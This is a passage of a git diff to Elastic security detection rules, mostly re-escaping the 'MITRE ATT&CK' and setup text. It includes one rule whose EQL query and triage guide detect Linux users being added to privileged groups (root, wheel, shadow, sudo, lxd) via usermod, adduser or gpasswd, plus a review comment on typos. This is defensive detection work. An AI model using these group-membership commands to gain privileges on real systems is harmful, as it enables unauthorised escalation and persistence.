--- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 73,
 "rule_id": "416697ae-e468-4093-a93d-59661fa619ec",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json
index 0be338ea72f..8e5eea8946c 100644
--- a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_101.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json
index 6d487432577..aa5bf600550 100644
--- a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_102.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json
index 1dae7f4a998..f88bcdc8463 100644
--- a/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/41824afb-d68c-4d0e-bfee-474dac1fa56e_103.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json
index 83be5f1da6b..9e97ed9967e 100644
--- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_102.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json
index 9cbb457fd92..3affb901072 100644
--- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_103.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json
index 10fe830243e..3642d21800d 100644
--- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_104.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json
index df16ba210d8..0d447d5388f 100644
--- a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_105.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json
index 34a40cf100f..952f061d3c5 100644
--- a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_1.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json
index 664e99ae8d7..2c9cbdfb1d9 100644
--- a/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/420e5bb4-93bf-40a3-8f4a-4cc1af90eca1_2.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json
index 3b6cdd7b41f..79a098da14b 100644
--- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_102.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json
index d0ffe6ab704..bf9c555946e 100644
--- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_103.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json
index 227badd06e4..c0dc8f04814 100644
--- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_104.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json
index c0b9da25347..0d972787188 100644
--- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_105.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json
index 6b04f41720d..b0bca300a85 100644
--- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_106.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json
index 387f1f82bf5..9961b6a793c 100644
--- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_207.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json
index 21b82ef885d..75ff10a5fbf 100644
--- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_5.json
@@ -82,7 +82,7 @@
 ],
 "risk_score": 47,
 "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266",
- "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -93,7 +93,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json
index 3bc6b8cdd3b..59620be5089 100644
--- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_6.json
@@ -77,7 +77,7 @@
 ],
 "risk_score": 47,
 "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266",
- "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -88,7 +88,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json
index a9ed6f6905a..21f67f24743 100644
--- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_7.json
@@ -77,7 +77,7 @@
 ],
 "risk_score": 47,
 "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266",
- "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Audit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -87,7 +87,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json
index aa51dec9b9e..443f706406d 100644
--- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_8.json
@@ -76,7 +76,7 @@
 ],
 "risk_score": 47,
 "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266",
- "setup": "\nAudit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nAudit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -86,7 +86,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json
index aedb0ee93c1..362b68b7fd4 100644
--- a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json
index ce7bf6ebfcc..a7991df1ae7 100644
--- a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_102.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json
index 56eef466878..8c41959f1bc 100644
--- a/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/4330272b-9724-4bc6-a3ca-f1532b81e5c2_103.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json
index f7c19cdbf3b..b1d7696ce11 100644
--- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_1.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json
index c1e28e7aadd..a7b02321c34 100644
--- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_2.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nprocess.parent.name == \"sudo\" and\nprocess.args in (\"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\n \"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\") and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", "related_integrations": [ { 
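Review bot: The new `note` line still ships two wording defects in the analyst-facing investigation guide that the re-escaping does not touch: the heading `### Investigating Linux User User Added to Privileged Group` repeats "User", and the first investigation step spells `succesfully`. These rule files appear to be generated from an upstream rule source, so the correction (`### Investigating Linux User Added to Privileged Group` and `successfully`) belongs there and would propagate on the next export; flagging it here so it is not lost in a serialization-only refresh. The identical text appears in the `_3` and `_4` hunks of this rule further down, and the `_4` copy additionally ends its guide with `\n\n` where `_2` and `_3` end with a single `\n`.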
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json
index 2cddba9db6d..9b1262149d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_3.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Added to Privileged Group", - "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
